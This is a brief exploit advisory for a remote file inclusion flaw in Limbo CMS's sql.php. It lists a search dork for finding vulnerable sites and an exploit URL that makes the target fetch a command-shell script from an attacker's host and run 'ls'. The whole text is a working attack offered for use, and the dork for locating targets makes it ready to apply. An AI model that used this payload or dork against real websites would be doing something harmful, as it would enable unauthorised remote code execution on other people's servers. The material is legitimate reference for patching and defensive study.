A remote file inclusion vulnerability exists in sql.php from Limbo CMS versions 1.0.4.2 and below.
a8f1be771e3a0e8d7be2119bad091cb9f7b276ac3b385312087a65f774a29f23
Title: Limbo CMS <= 1.04 Remote File Inclusion
URL: http://www.limbo-cms.com/
Dork: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
Credits: [Oo]
Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls